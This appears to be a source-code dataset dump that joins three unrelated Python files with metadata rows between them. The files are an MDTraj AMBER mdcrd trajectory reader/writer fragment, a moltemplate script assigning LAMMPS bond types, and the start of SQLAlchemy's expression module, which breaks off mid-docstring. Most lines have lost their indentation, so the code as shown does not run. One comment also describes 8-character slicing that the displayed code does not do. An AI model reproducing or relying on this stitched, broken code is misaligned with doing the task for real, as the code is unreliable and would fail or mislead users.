'does not appear to be a valid mdcrd file.' % \
(self._line_counter, self._filename))
length = len(items)
if i + length > len(coords):
raise IOError(
'mdcrd parse error: specified n_atoms (%d) is likely incorrect. '
'Incorrect buffer size encountered on line=%d' % (
self._n_atoms, self._line_counter))
coords[i:i+length] = items
i += length
if i == self._n_atoms * 3:
if self._has_box is False:
break
# peek ahead for box
here = self._fh.tell()
line = self._fh.readline()
peek = [float(elem) for elem in line.strip().split()]
if len(peek) == 3:
box = peek
else:
if self._has_box is True:
raise IOError('Box information not found in file.')
                    # rewind to before the peeked line
                    self._fh.seek(here)
break
self._frame_index += 1
return coords.reshape(self._n_atoms, 3), box
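    # Format note: each mdcrd frame is fixed-width text with up to ten
    # 8-character fields per line (AMBER's "10F8.3"), holding the flattened
    # x, y, z coordinates in atom order, optionally followed by a single
    # 3-number box line. That layout is why _read() above slices each line
    # into 8-character chunks.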
def write(self, xyz, cell_lengths=None):
"""Write one or more frames of data to a mdcrd file
Parameters
----------
xyz : np.ndarray, shape=(n_frames, n_atoms, 3)
The cartesian coordinates of the atoms to write. By convention, the
lengths should be in units of angstroms.
cell_lengths : np.ndarray, shape=(n_frames, 3), dtype=float32, optional
The length of the periodic box in each frame, in each direction,
`a`, `b`, `c`. By convention the lengths should be in units
of angstroms.
"""
if not self._mode == 'w':
raise ValueError('write() is only available when file is opened '
'in mode="w"')
xyz = ensure_type(xyz, np.float32, 3, 'xyz', can_be_none=False,
shape=(None, None, 3), warn_on_cast=False,
add_newaxis_on_deficient_ndim=True)
cell_lengths = ensure_type(cell_lengths, np.float32, 2, 'cell_lengths',
can_be_none=True, shape=(len(xyz), 3), warn_on_cast=False,
add_newaxis_on_deficient_ndim=True)
if self._w_has_box is None:
# this is the first write()
self._n_atoms = xyz.shape[1]
comment = 'TITLE : Created by MDTraj with %d atoms\n' % self._n_atoms
if PY3:
comment = comment.encode('ascii')
self._fh.write(comment)
if cell_lengths is None:
self._w_has_box = False
else:
self._w_has_box = True
elif self._w_has_box is True:
if cell_lengths is None:
raise ValueError('This mdcrd file must contain unitcell '
'information')
elif self._w_has_box is False:
if cell_lengths is not None:
raise ValueError('This mdcrd file must not contain unitcell '
'information')
else:
raise RuntimeError()
for i in range(xyz.shape[0]):
for j, coord in enumerate(xyz[i].reshape(-1)):
lfdone = False
out = "%8.3f" % coord
if len(out) > 8:
raise ValueError('Overflow error')
if PY3:
out = out.encode('ascii')
self._fh.write(out)
if (j+1) % 10 == 0:
self._fh.write(b"\n")
lfdone = True
if not lfdone:
self._fh.write(b"\n")
if cell_lengths is not None:
line = "%8.3f %8.3f %8.3f\n" % tuple(cell_lengths[i])
if PY3:
line = line.encode('ascii')
self._fh.write(line)
def seek(self, offset, whence=0):
"""Move to a new file position
Parameters
----------
offset : int
A number of frames.
whence : {0, 1, 2}
0: offset from start of file, offset should be >=0.
1: move relative to the current position, positive or negative
2: move relative to the end of file, offset should be <= 0.
Seeking beyond the end of a file is not supported
"""
if self._mode == 'r':
advance, absolute = None, None
if whence == 0 and offset >= 0:
if offset >= self._frame_index:
advance = offset - self._frame_index
else:
absolute = offset
elif whence == 1 and offset >= 0:
advance = offset
elif whence == 1 and offset < 0:
absolute = offset + self._frame_index
elif whence == 2 and offset <= 0:
raise NotImplementedError('offsets from the end are not supported yet')
else:
raise IOError('Invalid argument')
if advance is not None:
for i in range(advance):
self._read() # advance and throw away these frames
elif absolute is not None:
self._fh.close()
self._fh = open(self._filename, 'rb')
self._fh.readline() # read comment
self._frame_index = 0
self._line_counter = 1
for i in range(absolute):
self._read()
else:
raise RuntimeError()
else:
raise NotImplementedError('offsets in write mode are not supported yet')
def tell(self):
"""Current file position
Returns
-------
offset : int
The current frame in the file.
"""
return int(self._frame_index)
def __len__(self):
"Number of frames in the file"
raise NotImplementedError()
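# A minimal usage sketch (the file names are illustrative assumptions; both
# calls use only the interfaces defined above):
#
#     import mdtraj as md
#     traj = md.load_mdcrd('traj.mdcrd', top='system.pdb', stride=10)
#
#     with MDCRDTrajectoryFile('traj.mdcrd', n_atoms=traj.n_atoms) as f:
#         xyz, cell_lengths = f.read(n_frames=5)   # coordinates in angstroms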
|
casawa/mdtraj
|
mdtraj/formats/mdcrd.py
|
Python
|
lgpl-2.1
| 18,394
|
[
"Amber",
"MDTraj"
] |
6e734626b347df330c9daeee0cbb7937537be02dc4cddf23b998957dd261fca3
|
#!/usr/bin/env python
# Author: Andrew Jewett (jewett.aij at g mail)
# License: MIT License (See LICENSE.md)
# Copyright (c) 2013
"""
bonds_by_type.py reads a LAMMPS data file (or an excerpt of a LAMMPS)
data file containing bonded many-body interactions by atom type
(and bond type), and generates a list of additional interactions
in LAMMPS format consistent with those type (to the standard out).
Typical Usage:
bonds_by_type.py -atoms atoms.data \\
-bonds bonds.data \\
-bondsbytype bonds_by_type.data \\
> new_bonds.data
"""
g_program_name = __file__.split('/')[-1] # = 'bonds_by_type.py'
g_date_str = '2016-12-21'
g_version_str = '0.12.0'
import sys
import re
try:
from . import ttree_lex
from .lttree_styles import AtomStyle2ColNames, ColNames2AidAtypeMolid
except (ImportError, SystemError, ValueError):
# not installed as a package
import ttree_lex
from lttree_styles import AtomStyle2ColNames, ColNames2AidAtypeMolid
def LookupBondTypes(bond_types,
bond_ids,
bond_pairs,
lines_atoms,
lines_bonds,
lines_bondsbytype,
atom_style,
section_name,
prefix='',
suffix='',
bond_ids_offset=0):
# report_progress = False):
"""
LookupBondTypes() looks up bond types.
Output:
...It looks up the corresponding type of each bond and store it in the
"bond_types" list. (If the bond_ids were not specified by the user,
generate them and store them in the bond_ids list.)
Input (continued):
This function requires:
...a list of bonded pairs of atoms
stored in the lines_bonds variable (from the "Data Bond List"
or "Data Bonds AtomId AtomId" sections)
...and a list of atom types
stored in the lines_atoms variable (from the "Data Atoms" section)
...and a list of bond-types-as-a-function-of-atom-types
stored in the lines_bondsbytype (from the "Data Bonds By Type" section)
Generated bond_ids (if applicable) are of the form
prefix + str(number) + suffix
(where "number" begins at bond_ids_offset+1)
"""
column_names = AtomStyle2ColNames(atom_style)
i_atomid, i_atomtype, i_molid = ColNames2AidAtypeMolid(column_names)
atomids = []
atomtypes = []
atomids2types = {}
for iv in range(0, len(lines_atoms)):
line = lines_atoms[iv].strip()
if '#' in line:
icomment = line.find('#')
line = (line[:icomment]).strip()
if len(line) > 0:
tokens = ttree_lex.SplitQuotedString(line)
if ((len(tokens) <= i_atomid) or (len(tokens) <= i_atomtype)):
sys.stderr.write("\"" + line + "\"\n")
raise(ttree_lex.InputError(
                    'Error: not enough columns on line ' + str(iv + 1) + ' of \"Atoms\" section.'))
tokens = ttree_lex.SplitQuotedString(line)
atomid = ttree_lex.EscCharStrToChar(tokens[i_atomid])
atomids.append(atomid)
atomtype = ttree_lex.EscCharStrToChar(tokens[i_atomtype])
atomtypes.append(atomtype)
atomids2types[atomid] = atomtype
assert(isinstance(bond_ids, list))
assert(isinstance(bond_types, list))
assert(isinstance(bond_pairs, list))
del bond_ids[:]
del bond_types[:]
del bond_pairs[:]
for ie in range(0, len(lines_bonds)):
line = lines_bonds[ie].strip()
if '#' in line:
icomment = line.find('#')
line = (line[:icomment]).strip()
if len(line) == 0:
continue
tokens = ttree_lex.SplitQuotedString(line)
if section_name == "Data Bonds AtomId AtomId":
if len(tokens) == 2:
bondid_n = bond_ids_offset + len(bond_ids) + 1
bond_ids.append(prefix + str(bondid_n) + suffix)
bond_pairs.append((ttree_lex.EscCharStrToChar(tokens[0]),
ttree_lex.EscCharStrToChar(tokens[1])))
else:
raise(ttree_lex.InputError('Incorrect number of columns on line ' +
str(ie + 1) + ' of \"' + section_name + '\" section.'))
elif section_name == "Data Bond List":
if len(tokens) == 3:
bond_ids.append(ttree_lex.EscCharStrToChar(tokens[0]))
bond_pairs.append((ttree_lex.EscCharStrToChar(tokens[1]),
ttree_lex.EscCharStrToChar(tokens[2])))
else:
raise(ttree_lex.InputError('Incorrect number of columns on line ' +
str(ie + 1) + ' of \"' + section_name + '\" section.'))
else:
raise(ttree_lex.InputError('Internal Error (' + g_program_name +
'): Unknown section name: \"' + section_name + '\"'))
assert(len(bond_types) == 0)
typepattern_to_coefftypes = []
for i in range(0, len(lines_bondsbytype)):
line = lines_bondsbytype[i].strip()
if '#' in line:
icomment = line.find('#')
line = (line[:icomment]).strip()
if len(line) > 0:
tokens = ttree_lex.SplitQuotedString(line)
if (len(tokens) != 3):
raise(ttree_lex.InputError('Error: Wrong number of columns in the \"Bonds By Type\" section of data file.\n'
'Offending line:\n' +
'\"' + line + '\"\n'
'Expected 3 columns\n'))
coefftype = ttree_lex.EscCharStrToChar(tokens[0])
typepattern = []
for typestr in tokens[1:]:
if ((len(typestr) >= 2) and
(typestr[0] == '/') and (typestr[-1] == '/')):
regex_str = typestr[1:-1]
typepattern.append(re.compile(regex_str))
else:
typepattern.append(ttree_lex.EscCharStrToChar(typestr))
typepattern_to_coefftypes.append([typepattern, coefftype])
assert(len(bond_ids) == len(bond_pairs))
for ie in range(0, len(bond_ids)):
bond_types.append(None)
for ie in range(0, len(bond_ids)):
bondid = bond_ids[ie]
(atomid1, atomid2) = bond_pairs[ie]
if atomid1 not in atomids2types:
raise ttree_lex.InputError('Error: atom \"' + atomid1 + '\" not defined in \"Data Atoms\".\n'
' This usually happens when the user mistypes one of the names of the\n'
' $atoms in either a \"Data Atoms\" or \"Data Bond List\" section.\n'
                                       ' To find out where the mistake occurred, search the \n'
' \"ttree_assignments.txt\" file for:\n'
' \"' + atomid1 + '\"\n')
if atomid2 not in atomids2types:
raise ttree_lex.InputError('Error: atom \"' + atomid2 + '\" not defined in \"Data Atoms\".\n'
' This usually happens when the user mistypes one of the names of the\n'
' $atoms in either a \"Data Atoms\" or \"Data Bond List\" section.\n'
                                       ' To find out where the mistake occurred, search the \n'
' \"ttree_assignments.txt\" file for:\n'
' \"' + atomid2 + '\"\n')
atomtype1 = atomids2types[atomid1]
atomtype2 = atomids2types[atomid2]
for typepattern, coefftype in typepattern_to_coefftypes:
# use string comparisons to check if atom types match the pattern
if (ttree_lex.MatchesAll((atomtype1, atomtype2), typepattern) or
ttree_lex.MatchesAll((atomtype2, atomtype1), typepattern)):
# ("MatchesAll()" defined in "ttree_lex.py")
bond_types[ie] = coefftype
for ie in range(0, len(bond_ids)):
if not bond_types[ie]:
(atomid1, atomid2) = bond_pairs[ie]
atomtype1 = atomids2types[atomid1]
atomtype2 = atomids2types[atomid2]
raise ttree_lex.InputError('Error: No bond types defined for the bond between\n'
' atoms ' + atomid1 +
' (type ' + atomtype1 + ')\n'
' and ' + atomid2 + ' (type ' + atomtype2 + ')\n'
'\n'
' (If you are using a force field, then it probably means that you made a\n'
' mistake choosing at least one of these two @atom types from the list\n'
' of available atom types supplied by the force field. To fix it, edit\n'
' the corresponding lines in the "Data Atoms" section of your LT file.)\n')
def main():
sys.stderr.write(g_program_name + ' v' +
g_version_str + ' ' + g_date_str + ' ')
if sys.version < '3':
sys.stderr.write(' (python version < 3)\n')
else:
sys.stderr.write('\n')
try:
fname_atoms = None
fname_bond_list = None
fname_bondsbytype = None
section_name = 'Data Bond List' # (This will be replaced later.)
atom_style = 'full'
prefix = ''
suffix = ''
bond_lack_types = False
argv = [arg for arg in sys.argv]
        # Loop over the remaining arguments not processed yet.
        # These arguments are specific to this program
        # and are not understood by ttree.py:
i = 1
while i < len(argv):
#sys.stderr.write('argv['+str(i)+'] = \"'+argv[i]+'\"\n')
if ((argv[i].lower() == '-?') or
(argv[i].lower() == '--?') or
(argv[i].lower() == '-help') or
                (argv[i].lower() == '--help')):
                # print this module's docstring as the help text and exit
                sys.stdout.write(__doc__ + '\n')
                sys.exit(0)
elif argv[i].lower() == '-atoms':
if i + 1 >= len(argv):
raise ttree_lex.InputError('Error: ' + argv[i] + ' flag should be followed by a file name containing lines of\n'
' text which might appear in the "Atoms" section of a LAMMPS data file.\n')
fname_atoms = argv[i + 1]
del(argv[i:i + 2])
elif argv[i].lower() == '-bonds':
if i + 1 >= len(argv):
raise ttree_lex.InputError('Error: ' + argv[i] + ' flag should be followed by a file name containing lines of\n'
' text which might appear in the "Bonds" section of a LAMMPS data file.\n')
fname_bond_list = argv[i + 1]
del(argv[i:i + 2])
elif argv[i].lower() == '-bond-list':
if i + 1 >= len(argv):
raise ttree_lex.InputError(
'Error: ' + argv[i] + ' flag should be followed by a file name\n')
# raise ttree_lex.InputError('Error: '+argv[i]+' flag should be followed by a file name containing lines of\n'
# ' text which might appear in the "Bonds No Types" section of a LAMMPS data file.\n')
fname_bond_list = argv[i + 1]
section_name = "Data Bond List"
del(argv[i:i + 2])
elif argv[i].lower() == '-bondsbytype':
if i + 1 >= len(argv):
raise ttree_lex.InputError(
'Error: ' + argv[i] + ' flag should be followed by a file name\n')
# raise ttree_lex.InputError('Error: '+argv[i]+' flag should be followed by a file name containing\n'
# ' text which might appear in the "'+section_name+' By Type" section\n'
# ' of a LAMMPS data file.\n')
fname_bondsbytype = argv[i + 1]
del(argv[i:i + 2])
elif ((argv[i].lower() == '-atom-style') or
(argv[i].lower() == '-atom_style')):
if i + 1 >= len(argv):
raise ttree_lex.InputError('Error: ' + argv[i] + ' flag should be followed by a an atom_style name.\n'
' (Or single quoted string which includes a space-separated\n'
' list of column names.)\n')
atom_style = argv[i + 1]
del(argv[i:i + 2])
elif argv[i].lower() == '-prefix':
if i + 1 >= len(argv):
raise ttree_lex.InputError('Error: ' + argv[i] + ' flag should be followed by a prefix string\n'
' (a string you want to appear to the left of the integer\n'
' which counts the bonded interactions you have generated.)\n')
prefix = argv[i + 1]
del(argv[i:i + 2])
elif argv[i].lower() == '-suffix':
if i + 1 >= len(argv):
raise ttree_lex.InputError('Error: ' + argv[i] + ' flag should be followed by a suffix string\n'
' (a string you want to appear to the right of the integer\n'
' which counts the bonded interactions you have generated.)\n')
                suffix = argv[i + 1]
del(argv[i:i + 2])
elif argv[i][0] == '-':
raise ttree_lex.InputError('Error(' + g_program_name + '):\n'
                                           'Unrecognized command line argument \"' + argv[i] + '\"\n')
else:
i += 1
if len(argv) != 1:
            # if there are any remaining (unprocessed) arguments,
problem_args = ['\"' + arg + '\"' for arg in argv[1:]]
raise ttree_lex.InputError('Syntax Error(' + g_program_name + '):\n\n'
' Problem with argument list.\n'
' The remaining arguments are:\n\n'
' ' +
(' '.join(problem_args)) + '\n\n'
' (The actual problem may be earlier in the argument list.)\n')
bond_types = []
bond_ids = []
bond_pairs = []
fatoms = open(fname_atoms, 'r')
fbonds = open(fname_bond_list, 'r')
fbondsbytype = open(fname_bondsbytype, 'r')
lines_atoms = fatoms.readlines()
lines_bonds = fbonds.readlines()
lines_bondsbytype = fbondsbytype.readlines()
fatoms.close()
fbonds.close()
fbondsbytype.close()
LookupBondTypes(bond_types,
bond_ids,
bond_pairs,
lines_atoms,
lines_bonds,
lines_bondsbytype,
atom_style,
section_name,
prefix='',
suffix='')
assert(len(bond_types) == len(bond_ids) == len(bond_pairs))
        N = len(bond_types)
for ie in range(0, N):
sys.stdout.write(bond_ids[ie] + ' ' +
bond_types[ie] + ' ' +
bond_pairs[ie][0] + ' ' +
bond_pairs[ie][1] + '\n')
except (ValueError, ttree_lex.InputError) as err:
sys.stderr.write('\n' + str(err) + '\n')
sys.exit(-1)
return
if __name__ == "__main__":
main()
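# A worked example of the expected column layouts (the identifiers below are
# illustrative, not taken from a real force field):
#
#     "Data Bond List" input (bond-ID atom-ID atom-ID):
#         $bond:b1 $atom:a1 $atom:a2
#     "Data Bonds By Type" input (bond-type atom-type atom-type):
#         @bond:CC @atom:C @atom:C
#
# Each line written to the standard out then has the form
#     bond-ID bond-type atom-ID atom-ID
# where the bond type comes from a pattern matching the two atom types in
# either order (when several patterns match, the last one listed wins).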
|
smsaladi/moltemplate
|
moltemplate/bonds_by_type.py
|
Python
|
bsd-3-clause
| 16,486
|
[
"LAMMPS"
] |
9bba8d033623e09568034dc73e0a78756006dda45fbcd95ae26b5544c9d51364
|
# expression.py
# Copyright (C) 2005, 2006, 2007, 2008, 2009, 2010 Michael Bayer mike_mp@zzzcomputing.com
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Defines the base components of SQL expression trees.
All components are derived from a common base class
:class:`ClauseElement`. Common behaviors are organized
based on class hierarchies, in some cases via mixins.
All object construction from this package occurs via functions which
in some cases will construct composite :class:`ClauseElement` structures
together, and in other cases simply return a single :class:`ClauseElement`
constructed directly. The function interface affords a more "DSL-ish"
feel to constructing SQL expressions and also allows future class
reorganizations.
Even though classes are not constructed directly from the outside,
most classes which have additional public methods are considered to be
public (i.e. have no leading underscore). Other classes which are
"semi-public" are marked with a single leading underscore; these
classes usually have few or no public methods and are less guaranteed
to stay the same in future releases.
"""
import itertools, re
from operator import attrgetter
from sqlalchemy import util, exc #, types as sqltypes
from sqlalchemy.sql import operators
from sqlalchemy.sql.visitors import Visitable, cloned_traverse
import operator
functions, schema, sql_util, sqltypes = None, None, None, None
DefaultDialect, ClauseAdapter, Annotated = None, None, None
__all__ = [
'Alias', 'ClauseElement',
'ColumnCollection', 'ColumnElement',
'CompoundSelect', 'Delete', 'FromClause', 'Insert', 'Join',
'Select', 'Selectable', 'TableClause', 'Update', 'alias', 'and_', 'asc',
'between', 'bindparam', 'case', 'cast', 'column', 'delete',
'desc', 'distinct', 'except_', 'except_all', 'exists', 'extract', 'func',
'modifier', 'collate',
'insert', 'intersect', 'intersect_all', 'join', 'label', 'literal',
'literal_column', 'not_', 'null', 'or_', 'outparam', 'outerjoin', 'select',
'subquery', 'table', 'text', 'tuple_', 'union', 'union_all', 'update', ]
PARSE_AUTOCOMMIT = util._symbol('PARSE_AUTOCOMMIT')
def desc(column):
"""Return a descending ``ORDER BY`` clause element.
e.g.::
order_by = [desc(table1.mycol)]
"""
return _UnaryExpression(column, modifier=operators.desc_op)
def asc(column):
"""Return an ascending ``ORDER BY`` clause element.
e.g.::
order_by = [asc(table1.mycol)]
"""
return _UnaryExpression(column, modifier=operators.asc_op)
def outerjoin(left, right, onclause=None):
"""Return an ``OUTER JOIN`` clause element.
The returned object is an instance of :class:`Join`.
Similar functionality is also available via the :func:`outerjoin()`
method on any :class:`FromClause`.
left
The left side of the join.
right
The right side of the join.
onclause
Optional criterion for the ``ON`` clause, is derived from
foreign key relationships established between left and right
otherwise.
To chain joins together, use the :func:`join()` or :func:`outerjoin()`
methods on the resulting :class:`Join` object.
"""
return Join(left, right, onclause, isouter=True)
def join(left, right, onclause=None, isouter=False):
"""Return a ``JOIN`` clause element (regular inner join).
The returned object is an instance of :class:`Join`.
Similar functionality is also available via the :func:`join()` method
on any :class:`FromClause`.
left
The left side of the join.
right
The right side of the join.
onclause
Optional criterion for the ``ON`` clause, is derived from
foreign key relationships established between left and right
otherwise.
To chain joins together, use the :func:`join()` or :func:`outerjoin()`
methods on the resulting :class:`Join` object.
"""
return Join(left, right, onclause, isouter)
def select(columns=None, whereclause=None, from_obj=[], **kwargs):
"""Returns a ``SELECT`` clause element.
Similar functionality is also available via the :func:`select()`
method on any :class:`FromClause`.
The returned object is an instance of :class:`Select`.
All arguments which accept :class:`ClauseElement` arguments also accept
string arguments, which will be converted as appropriate into
either :func:`text()` or :func:`literal_column()` constructs.
columns
A list of :class:`ClauseElement` objects, typically :class:`ColumnElement`
objects or subclasses, which will form the columns clause of the
resulting statement. For all members which are instances of
:class:`Selectable`, the individual :class:`ColumnElement` members of the
:class:`Selectable` will be added individually to the columns clause.
For example, specifying a :class:`~sqlalchemy.schema.Table` instance will result in all
the contained :class:`~sqlalchemy.schema.Column` objects within to be added to the
columns clause.
This argument is not present on the form of :func:`select()`
available on :class:`~sqlalchemy.schema.Table`.
whereclause
A :class:`ClauseElement` expression which will be used to form the
``WHERE`` clause.
from_obj
A list of :class:`ClauseElement` objects which will be added to the
``FROM`` clause of the resulting statement. Note that "from"
objects are automatically located within the columns and
whereclause ClauseElements. Use this parameter to explicitly
specify "from" objects which are not automatically locatable.
This could include :class:`~sqlalchemy.schema.Table` objects that aren't otherwise
    present, or :class:`Join` objects whose presence will supersede that
of the :class:`~sqlalchemy.schema.Table` objects already located in the other clauses.
\**kwargs
Additional parameters include:
autocommit
Deprecated. Use .execution_options(autocommit=<True|False>)
to set the autocommit option.
prefixes
a list of strings or :class:`ClauseElement` objects to include
directly after the SELECT keyword in the generated statement,
for dialect-specific query features.
distinct=False
when ``True``, applies a ``DISTINCT`` qualifier to the columns
clause of the resulting statement.
use_labels=False
when ``True``, the statement will be generated using labels
for each column in the columns clause, which qualify each
column with its parent table's (or aliases) name so that name
conflicts between columns in different tables don't occur.
The format of the label is <tablename>_<column>. The "c"
collection of the resulting :class:`Select` object will use these
names as well for targeting column members.
for_update=False
when ``True``, applies ``FOR UPDATE`` to the end of the
resulting statement. Certain database dialects also support
alternate values for this parameter, for example mysql
supports "read" which translates to ``LOCK IN SHARE MODE``,
and oracle supports "nowait" which translates to ``FOR UPDATE
NOWAIT``.
correlate=True
indicates that this :class:`Select` object should have its
contained :class:`FromClause` elements "correlated" to an enclosing
:class:`Select` object. This means that any :class:`ClauseElement`
instance within the "froms" collection of this :class:`Select`
which is also present in the "froms" collection of an
enclosing select will not be rendered in the ``FROM`` clause
of this select statement.
group_by
a list of :class:`ClauseElement` objects which will comprise the
``GROUP BY`` clause of the resulting select.
having
a :class:`ClauseElement` that will comprise the ``HAVING`` clause
of the resulting select when ``GROUP BY`` is used.
order_by
a scalar or list of :class:`ClauseElement` objects which will
comprise the ``ORDER BY`` clause of the resulting select.
limit=None
a numerical value which usually compiles to a ``LIMIT``
expression in the resulting select. Databases that don't
support ``LIMIT`` will attempt to provide similar
functionality.
offset=None
a numeric value which usually compiles to an ``OFFSET``
expression in the resulting select. Databases that don't
support ``OFFSET`` will attempt to provide similar
functionality.
bind=None
an ``Engine`` or ``Connection`` instance to which the
      resulting ``Select`` object will be bound. The ``Select``
object will otherwise automatically bind to whatever
``Connectable`` instances can be located within its contained
:class:`ClauseElement` members.
"""
return Select(columns, whereclause=whereclause, from_obj=from_obj, **kwargs)
def subquery(alias, *args, **kwargs):
"""Return an :class:`Alias` object derived
from a :class:`Select`.
    alias
      the alias name
\*args, \**kwargs
all other arguments are delivered to the
:func:`select` function.
"""
return Select(*args, **kwargs).alias(alias)
def insert(table, values=None, inline=False, **kwargs):
"""Return an :class:`Insert` clause element.
Similar functionality is available via the :func:`insert()` method on
:class:`~sqlalchemy.schema.Table`.
:param table: The table to be inserted into.
:param values: A dictionary which specifies the column specifications of the
``INSERT``, and is optional. If left as None, the column
specifications are determined from the bind parameters used
during the compile phase of the ``INSERT`` statement. If the
bind parameters also are None during the compile phase, then the
column specifications will be generated from the full list of
table columns. Note that the :meth:`~Insert.values()` generative method
may also be used for this.
:param prefixes: A list of modifier keywords to be inserted between INSERT
and INTO. Alternatively, the :meth:`~Insert.prefix_with` generative method
may be used.
:param inline: if True, SQL defaults will be compiled 'inline' into the
statement and not pre-executed.
If both `values` and compile-time bind parameters are present, the
compile-time bind parameters override the information specified
within `values` on a per-key basis.
The keys within `values` can be either :class:`~sqlalchemy.schema.Column` objects or their
string identifiers. Each key may reference one of:
* a literal data value (i.e. string, number, etc.);
* a Column object;
* a SELECT statement.
If a ``SELECT`` statement is specified which references this
``INSERT`` statement's table, the statement will be correlated
against the ``INSERT`` statement.
"""
return Insert(table, values, inline=inline, **kwargs)
def update(table, whereclause=None, values=None, inline=False, **kwargs):
"""Return an :class:`Update` clause element.
Similar functionality is available via the :func:`update()` method on
:class:`~sqlalchemy.schema.Table`.
:param table: The table to be updated.
:param whereclause: A :class:`ClauseElement` describing the ``WHERE`` condition
of the ``UPDATE`` statement. Note that the :meth:`~Update.where()`
generative method may also be used for this.
:param values:
A dictionary which specifies the ``SET`` conditions of the
``UPDATE``, and is optional. If left as None, the ``SET``
conditions are determined from the bind parameters used during
the compile phase of the ``UPDATE`` statement. If the bind
parameters also are None during the compile phase, then the
``SET`` conditions will be generated from the full list of table
columns. Note that the :meth:`~Update.values()` generative method may
also be used for this.
:param inline:
if True, SQL defaults will be compiled 'inline' into the statement
and not pre-executed.
If both `values` and compile-time bind parameters are present, the
compile-time bind parameters override the information specified
within `values` on a per-key basis.
The keys within `values` can be either :class:`~sqlalchemy.schema.Column` objects or their
string identifiers. Each key may reference one of:
* a literal data value (i.e. string, number, etc.);
* a Column object;
* a SELECT statement.
If a ``SELECT`` statement is specified which references this
``UPDATE`` statement's table, the statement will be correlated
against the ``UPDATE`` statement.
"""
return Update(
table,
whereclause=whereclause,
values=values,
inline=inline,
**kwargs)
def delete(table, whereclause = None, **kwargs):
"""Return a :class:`Delete` clause element.
Similar functionality is available via the :func:`delete()` method on
:class:`~sqlalchemy.schema.Table`.
:param table: The table to be updated.
:param whereclause: A :class:`ClauseElement` describing the ``WHERE``
condition of the ``UPDATE`` statement. Note that the :meth:`~Delete.where()`
generative method may be used instead.
"""
return Delete(table, whereclause, **kwargs)
def and_(*clauses):
"""Join a list of clauses together using the ``AND`` operator.
The ``&`` operator is also overloaded on all
:class:`_CompareMixin` subclasses to produce the
same result.
"""
if len(clauses) == 1:
return clauses[0]
return BooleanClauseList(operator=operators.and_, *clauses)
def or_(*clauses):
"""Join a list of clauses together using the ``OR`` operator.
The ``|`` operator is also overloaded on all
:class:`_CompareMixin` subclasses to produce the
same result.
"""
if len(clauses) == 1:
return clauses[0]
return BooleanClauseList(operator=operators.or_, *clauses)
def not_(clause):
"""Return a negation of the given clause, i.e. ``NOT(clause)``.
The ``~`` operator is also overloaded on all
:class:`_CompareMixin` subclasses to produce the
same result.
"""
return operators.inv(_literal_as_binds(clause))
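# A brief illustration of the conjunction helpers above (a sketch only;
# "users" stands for a hypothetical Table with "name" and "age" columns):
#
#     stmt = select([users]).where(
#         and_(users.c.name == 'ed',
#              or_(users.c.age < 20, users.c.age > 65)))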
def distinct(expr):
"""Return a ``DISTINCT`` clause."""
expr = _literal_as_binds(expr)
return _UnaryExpression(expr, operator=operators.distinct_op, type_=expr.type)
def between(ctest, cleft, cright):
"""Return a ``BETWEEN`` predicate clause.
Equivalent of SQL ``clausetest BETWEEN clauseleft AND clauseright``.
The :func:`between()` method on all
:class:`_CompareMixin` subclasses provides
similar functionality.
"""
ctest = _literal_as_binds(ctest)
return ctest.between(cleft, cright)
def case(whens, value=None, else_=None):
"""Produce a ``CASE`` statement.
whens
A sequence of pairs, or alternatively a dict,
to be translated into "WHEN / THEN" clauses.
value
Optional for simple case statements, produces
a column expression as in "CASE <expr> WHEN ..."
else\_
Optional as well, for case defaults produces
the "ELSE" portion of the "CASE" statement.
The expressions used for THEN and ELSE,
when specified as strings, will be interpreted
as bound values. To specify textual SQL expressions
for these, use the literal_column(<string>) or
text(<string>) construct.
The expressions used for the WHEN criterion
may only be literal strings when "value" is
present, i.e. CASE table.somecol WHEN "x" THEN "y".
Otherwise, literal strings are not accepted
in this position, and either the text(<string>)
or literal(<string>) constructs must be used to
interpret raw string values.
Usage examples::
case([(orderline.c.qty > 100, item.c.specialprice),
(orderline.c.qty > 10, item.c.bulkprice)
], else_=item.c.regularprice)
case(value=emp.c.type, whens={
'engineer': emp.c.salary * 1.1,
'manager': emp.c.salary * 3,
})
Using :func:`literal_column()`, to allow for databases that
do not support bind parameters in the ``then`` clause. The type
can be specified which determines the type of the :func:`case()` construct
overall::
case([(orderline.c.qty > 100, literal_column("'greaterthan100'", String)),
(orderline.c.qty > 10, literal_column("'greaterthan10'", String))
    ], else_=literal_column("'lessthan10'", String))
"""
return _Case(whens, value=value, else_=else_)
def cast(clause, totype, **kwargs):
"""Return a ``CAST`` function.
Equivalent of SQL ``CAST(clause AS totype)``.
Use with a :class:`~sqlalchemy.types.TypeEngine` subclass, i.e::
cast(table.c.unit_price * table.c.qty, Numeric(10,4))
or::
cast(table.c.timestamp, DATE)
"""
return _Cast(clause, totype, **kwargs)
def extract(field, expr):
"""Return the clause ``extract(field FROM expr)``."""
return _Extract(field, expr)
def collate(expression, collation):
"""Return the clause ``expression COLLATE collation``."""
expr = _literal_as_binds(expression)
return _BinaryExpression(
expr,
_literal_as_text(collation),
operators.collate, type_=expr.type)
def exists(*args, **kwargs):
"""Return an ``EXISTS`` clause as applied to a :class:`Select` object.
Calling styles are of the following forms::
# use on an existing select()
s = select([table.c.col1]).where(table.c.col2==5)
s = exists(s)
# construct a select() at once
exists(['*'], **select_arguments).where(criterion)
# columns argument is optional, generates "EXISTS (SELECT *)"
# by default.
exists().where(table.c.col2==5)
"""
return _Exists(*args, **kwargs)
def union(*selects, **kwargs):
"""Return a ``UNION`` of multiple selectables.
The returned object is an instance of
:class:`CompoundSelect`.
A similar :func:`union()` method is available on all
:class:`FromClause` subclasses.
\*selects
a list of :class:`Select` instances.
\**kwargs
available keyword arguments are the same as those of
:func:`select`.
"""
return _compound_select('UNION', *selects, **kwargs)
def union_all(*selects, **kwargs):
"""Return a ``UNION ALL`` of multiple selectables.
The returned object is an instance of
:class:`CompoundSelect`.
A similar :func:`union_all()` method is available on all
:class:`FromClause` subclasses.
\*selects
a list of :class:`Select` instances.
\**kwargs
available keyword arguments are the same as those of
:func:`select`.
"""
return _compound_select('UNION ALL', *selects, **kwargs)
def except_(*selects, **kwargs):
"""Return an ``EXCEPT`` of multiple selectables.
The returned object is an instance of
:class:`CompoundSelect`.
\*selects
a list of :class:`Select` instances.
\**kwargs
available keyword arguments are the same as those of
:func:`select`.
"""
return _compound_select('EXCEPT', *selects, **kwargs)
def except_all(*selects, **kwargs):
"""Return an ``EXCEPT ALL`` of multiple selectables.
The returned object is an instance of
:class:`CompoundSelect`.
\*selects
a list of :class:`Select` instances.
\**kwargs
available keyword arguments are the same as those of
:func:`select`.
"""
